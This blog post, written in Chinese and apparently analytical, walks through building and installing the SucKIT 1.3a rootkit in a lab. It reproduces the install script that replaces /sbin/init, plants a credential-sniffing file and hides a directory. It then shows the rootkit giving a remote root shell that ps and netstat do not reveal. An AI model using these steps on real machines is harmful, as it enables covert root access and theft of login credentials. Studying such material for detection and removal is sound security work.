android devik进程,suckit后门程序的分析 (二)

这篇文章为我早期的时候发表的文章,为什么我要写这个呢?因为这个程序写得太精妙了,我不得不佩服他的隐藏性,非常先进。看看我写的就知道他的精妙之处了!

关于这场攻击与反攻击的文章我随后几天撰写。精彩不容错过!:P

[root@Learning sk-1.3a]#make

Please do `make skconfig` in top level directory to generate configuration file.

make: *** [include/config.h] Error 1 (告诉我们不要用make,而是用make skconfig)

[root@Learning sk-1.3a]#make skconfig

rm -f include/config.h sk login inst

make[1]: Entering directory `/root/backdoor/sk-1.3a/src'

make[1]: Leaving directory `/root/backdoor/sk-1.3a/src'

make[1]: Entering directory `/root/backdoor/sk-1.3a/src'

gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c sha1.c

gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c crypto.c

gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -s zpass.c sha1.o crypto.o -o pass

make[1]: Leaving directory `/root/backdoor/sk-1.3a/src'

[===== SucKIT version 1.3a, Jul 26 2004 =====]

[====== ©oded by sd & devik , 2002 ======]

Please enter new rootkit password: (让我们输入密码)

Again, just to be sure: (再次输入确认密码)

OK, new password set.

Home directory [/usr/share/locale/sk/.sk12]: (通过后门进入的缺省目录)

Magic file-hiding suffix [sk12]: (sk12后门程序,使用ls –l可以察看到有个.sniffer文件,这个文件是可以窃听到ssh、ftp、telnet等远程登陆的用户名与密码信息,这也正是为何debian服务器接连被黑的事件发生)

Configuration saved. (保存配置文件)

From now, _only_ this configuration will be used by generated

binaries till you do skconfig again.

To (re)build all of stuff type 'make' (开始执行make命令)

[root@Learning sk-1.3a]# make

make[1]: Entering directory `/root/backdoor/sk-1.3a/src'

gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -s zlogin.c sha1.o crypto.o -o login

rm -f sk kernel.o

make sk

make[2]: Entering directory `/root/backdoor/sk-1.3a/src'

make[3]: Entering directory `/root/backdoor/sk-1.3a/src'

gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c backdoor.c

gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c client.c

gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c install.c

gcc -S -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b kernel.c -o - | grep -vE ".align|.p2align|.text|.data|.rodata|#|.ident|.file|.version" >> kernel.s

gcc -c kernel.s

gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c kmem.c

gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c lib.c

gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c main.c

gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c pattern.c

gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c printf.c

make[3]: Leaving directory `/root/backdoor/sk-1.3a/src'

gcc -s -nostdlib *.o -o sk

make[2]: Leaving directory `/root/backdoor/sk-1.3a/src'

make[1]: Leaving directory `/root/backdoor/sk-1.3a/src'

make[1]: Entering directory `/root/backdoor/sk-1.3a/src'

gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -s zbin2oct.c -o bin2oct

make[1]: Leaving directory `/root/backdoor/sk-1.3a/src'

cp -f src/login login

cp -f src/sk sk

Creating install script

echo "#!/bin/bash" > inst

echo "D=`cat include/config.h | grep HOME | awk {'print $3'}`" >> inst

echo "H=`cat include/config.h | grep HIDESTR | awk {'print $3'}`" >> inst

echo "mkdir -p $D; cd $D" >> inst

echo "echo > .sniffer; chmod 0622 .sniffer" >> inst

echo "echo -n -e `gzip -9 -c sk | src/bin2oct` | gzip -d > sk" >> inst

echo "chmod 0755 sk; if [ ! -f /sbin/init${H} ]; "

"then cp -f /sbin/init /sbin/init${H}; fi;"

"rm -f /sbin/init; cp sk /sbin/init" >> inst

Okay, file 'inst' is complete, self-installing script. (将inst文件属性为可执行)

Just upload it somewhere, execute and you could log in using

./login binary.

Have fun!

[root@Learning sk-1.3a]#chmod +x inst (将inst文件属性为可执行)

[root@Learning sk-1.3a]# ./inst

Your home is /usr/share/locale/sk/.sk12, go there and type ./sk to install

us into memory. Have fun!

[root@Learning sk-1.3a]#./sk (执行sk后门程序)

[===== SucKIT version 1.3a, Jul 26 2004 =====]

[====== ©oded by sd & devik , 2002 ======]

RK_Init: idt=0xc028f000, sct[]=0xc023e13c, kmalloc()=0xc012c180, gfp=0xf0

Z_Init: Allocating kernel-code memory...Done, 12902 bytes, base=0xc3dd8000

BD_Init: Starting backdoor daemon...Done, pid=1354 (后门加载成功)

[root@Learning sk-1.3a]#

下面该如何去做呢?我该如何做到可以远程登陆呢?究竟执行完这些程序,系统做了些什么呢?为何我ps ax 、netstat –alp看不到任何可疑的现象呢?呵呵,要是能看到的话,也就不是RootKit了。不要着急,一切都将在下面的操作中一目了然。Sk高明就高明在可以通过目前正在使用的端口悄无声息的进入到系统中。譬如系统开了DNS-53、FTP-21、SSH-22、http-80端口,那么程序可以绑定在这些端口,以正常访问的模式进入到系统中。在netstat –alp看不到其余打开的服务端口。OK,下面操作可以将程序的运作方式暴露无遗

[root@Learning sk-1.3a]# ls

config doc include inst login Makefile sk src

看到login了吧,这不是linux系统本身的login程序,而是后门进入的一把钥匙。

[root@Learning sk-1.3a]# ./login

[===== SucKIT version 1.3a, Jul 26 2004 =====]

[====== ©oded by sd & devik , 2002 ======]

use:

./login [hsditc] ...args

-h Specifies ip/hostname of host where is running

suckitd

(远程登陆到正在运行着的Suckit后门程序的服务器)

-s Specifies port where we should listen for incoming

server' connection (if some firewalled etc), if not

specified, we'll get some from os

(指定运行着的Suckit后门程序的服务器的port,如果不指定,系统将进行扫描,找到正在运行着的端口进入)

-d Specifies port of service we could use for authentication

echo, telnet, ssh, httpd... is probably good choice

-i Interval between request sends (in seconds)

-t Time we will wait for server before giving up (in seconds)

-c Connect timeout (in seconds)

[root@Learning sk-1.3a]#

注意,login不是在已经安装了后门的服务器运行着的,而是用其它的服务器来运行login远程登陆这台被安装了后门得服务器,okey,我去找找另外一台服务器,上传了这个login后,我要开始偷偷进入喽!

注意:这是另外一台client服务器,用来远程登陆的login到安装后门的动作

[root@linux_server tmp]# ./login -h 192.168.1.2

[===== SucKIT version 1.3a, Jul 26 2004 =====]

[====== ©oded by sd & devik , 2002 ======]

Listening to port 34245

password: (输入你刚才安装Suckit程序的密码)

Trying 192.168.1.2:53...

connect: Connection refused 不能登陆

Trying 192.168.1.2:79...

connect: Connection refused 不能登陆

Trying 192.168.1.2:110...

connect: Connection refused 不能登陆

Trying 192.168.1.2:220...

connect: Connection refused 不能登陆

Trying 192.168.1.2:21...

connect: Connection refused 不能登陆

Trying 192.168.1.2:22... 开了ssh服务,我要进去啦

Trying...Et voila

Server connected. Escape character is '^K'

[===== SucKIT version 1.3a, Jul 26 2004 =====]

[====== ©oded by sd & devik , 2002 ======]

[root@Learning .sk12]# 我终于进来啦!

[root@Learning .sk12]# ifconfig

eth0 Link encap:Ethernet HWaddr 00:02:6B:00:2E:31

inet addr:192.168.1.2 Bcast:192.168.1.255 Mask:255.255.255.0

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:7612 errors:0 dropped:0 overruns:0 frame:0

TX packets:2634 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:100

RX bytes:777061 (758.8 Kb) TX bytes:360531 (352.0 Kb)

Interrupt:12 Base address:0x7000

lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0

UP LOOPBACK RUNNING MTU:16436 Metric:1

RX packets:272 errors:0 dropped:0 overruns:0 frame:0

TX packets:272 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:19008 (18.5 Kb) TX bytes:19008 (18.5 Kb)

[root@Learning .sk12]# pwd

/usr/share/locale/sk/.sk12

[root@Learning .sk12]# (没错,我进来的时候缺省的就是这个目录)

[root@Learning .sk12]# id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

(我是上帝了)

[root@Learning .sk12]# who

root tty1 Jul 26 08:48 (这个是本地登陆的信息,没有远程登陆的账户名称信息,看来确实隐藏成功了)

[root@Learning root]# ps ax

PID TTY STAT TIME COMMAND

1 ? S 0:06 init [3]

2 ? SW 0:00 [keventd]

3 ? SW 0:00 [kapm-idled]

4 ? SWN 0:00 [ksoftirqd_CPU0]

5 ? SW 0:00 [kswapd]

6 ? SW 0:00 [kreclaimd]

7 ? SW 0:00 [bdflush]

8 ? SW 0:00 [kupdated]

9 ? SW< 0:00 [mdrecoveryd]

20 ? SW 0:00 [kjournald]

98 ? SW 0:00 [khubd]

190 ? SW 0:00 [kjournald]

610 ? S 0:00 syslogd -m 0

615 ? S 0:00 klogd -2

635 ? S 0:00 portmap

653 ? S 0:00 /usr/sbin/sshd

679 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUTH_ANON -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAV

723 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUTH_ANON -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAV

724 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUTH_ANON -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAV

725 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUTH_ANON -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAV

726 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUTH_ANON -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAV

727 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUTH_ANON -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAV

732 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUTH_ANON -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAV

733 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUTH_ANON -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAV

734 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUTH_ANON -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAV

743 ? S 0:00 /usr/bin/postmaster -D /var/lib/pgsql/data

782 ? S 0:00 crond

790 tty2 S 0:00 /sbin/mingetty tty2

791 tty3 S 0:00 /sbin/mingetty tty3

792 tty4 S 0:00 /sbin/mingetty tty4

793 tty5 S 0:00 /sbin/mingetty tty5

794 tty6 S 0:00 /sbin/mingetty tty6

1108 tty1 S 0:00 login -- root

1386 tty1 S 0:00 -bash

1439 ? S 0:00 /usr/sbin/sshd

1440 pts/0 S 0:00 -bash

1483 pts/0 R 0:00 ps ax

[root@Learning root]# (这是我安装了Suckit后门服务器的ps状态,呵呵,没有什么可疑的程序出现了吧)

[root@Learning root]# netstat –alp

tcp 0 0 *:sunrpc *:* LISTEN 635/portmap

tcp 0 0 *:http *:* LISTEN 679/httpd

tcp 0 0 *:ssh *:* LISTEN 653/sshd

tcp 0 0 *:https *:* LISTEN 679/httpd

tcp 0 20 Learning:ssh 192.168.1.70:1874 ESTABLISHED 1439/sshd

udp 0 0 *:sunrpc *:* 635/portmap

Active UNIX domain sockets (servers and established)

Proto RefCnt Flags Type State I-Node PID/Program name Path

unix 2 [ ACC ] STREAM LISTENING 1442 743/postmaster /tmp/.s.PGSQL.5432

unix 5 [ ] DGRAM 1142 610/syslogd /dev/log

unix 2 [ ] DGRAM 22557 1108/login -- root

unix 2 [ ] DGRAM 2207 782/crond

unix 2 [ ] DGRAM 1151 615/klogd

unix 2 [ ] STREAM CONNECTED 885 1/init [3]

呵呵我也看不到有任何可疑的端口在连接活动啊?奇怪奇怪。那我从远程login进入的服务器后的状态看看吧。哈哈,一目了然拉!!!!

[root@Learning .sk12]# ps ax

PID TTY STAT TIME COMMAND

1 ? S 0:06 init [3]

2 ? SW 0:00 [keventd]

3 ? SW 0:00 [kapm-idled]

4 ? SWN 0:00 [ksoftirqd_CPU0]

5 ? SW 0:00 [kswapd]

6 ? SW 0:00 [kreclaimd]

7 ? SW 0:00 [bdflush]

8 ? SW 0:00 [kupdated]

9 ? SW< 0:00 [mdrecoveryd]

20 ? SW 0:00 [kjournald]

98 ? SW 0:00 [khubd]

190 ? SW 0:00 [kjournald]

610 ? S 0:00 syslogd -m 0

615 ? S 0:00 klogd -2

635 ? S 0:00 portmap

653 ? S 0:00 /usr/sbin/sshd

679 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUT

723 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUT

724 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUT

725 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUT

726 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUT

727 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUT

732 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUT

733 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUT

734 ? S 0:00 /usr/sbin/httpd -DHAVE_ACCESS -DHAVE_PROXY -DHAVE_AUT

743 ? S 0:00 /usr/bin/postmaster -D /var/lib/pgsql/data

782 ? S 0:00 crond

790 tty2 S 0:00 /sbin/mingetty tty2

791 tty3 S 0:00 /sbin/mingetty tty3

792 tty4 S 0:00 /sbin/mingetty tty4

793 tty5 S 0:00 /sbin/mingetty tty5

794 tty6 S 0:00 /sbin/mingetty tty6

1108 tty1 S 0:00 login -- root

1354 ? S 0:00 ./sk (哈哈,sk进程出来了吧)

1376 ttyp0 S 0:00 sh -i

1386 tty1 S 0:00 -bash

1439 ? S 0:00 /usr/sbin/sshd

1440 pts/0 S 0:00 -bash

1492 ttyp0 R 0:00 ps ax

[root@Learning .sk12]# netstat -alp

Active Internet connections (servers and established)

Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name

tcp 0 0 *:sunrpc *:* LISTEN 635/portmap

tcp 0 0 *:http *:* LISTEN 679/httpd

tcp 0 0 *:ssh *:* LISTEN 653/sshd

tcp 0 0 *:https *:* LISTEN 679/httpd

tcp 0 0 Learning:1076 192.168.1.66:34245 ESTABLISHED 1374/sk

tcp 0 0 Learning:ssh 192.168.1.70:1874 ESTABLISHED 1439/sshd

udp 0 0 *:sunrpc *:* 635/portmap

raw 0 0 *:tcp *:* 7 1354/sk

Active UNIX domain sockets (servers and established)

Proto RefCnt Flags Type State I-Node PID/Program name Path

unix 2 [ ACC ] STREAM LISTENING 1442 743/postmaster /tmp/.s.PGSQL.5432

unix 5 [ ] DGRAM 1142 610/syslogd /dev/log

unix 2 [ ] DGRAM 22557 1108/login -- root

unix 2 [ ] DGRAM 2207 782/crond

unix 2 [ ] DGRAM 1151 615/klogd

unix 2 [ ] STREAM CONNECTED 885 1/init [3]

红色的看到了吧。哈哈,而且设置成了raw模式,找到了。不过不从远程登陆这台已经安装了后门程序的方式进来,那么很难去发现系统到底该如何发现后门了。

从以上大家可以看到,Suckit真的不愧为有这个称号,它可以吸附到目前服务器打开的端口,从中远程偷偷登陆进来,进来后也是隐身的方式。Ps、netstat等等程序根本无法跟踪到该服务程序是否在运行。这就是Suckit,看来卸载该程序也比较困难喽,呵呵,经过研究发现,其实不是很难,只需要细心就足够了。稍后整理后,将如何卸载Suckit的方式呈现给朋友们

学识粗浅,上述有些地方说得让高手们见笑了,如有任何错误请高手们请教。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值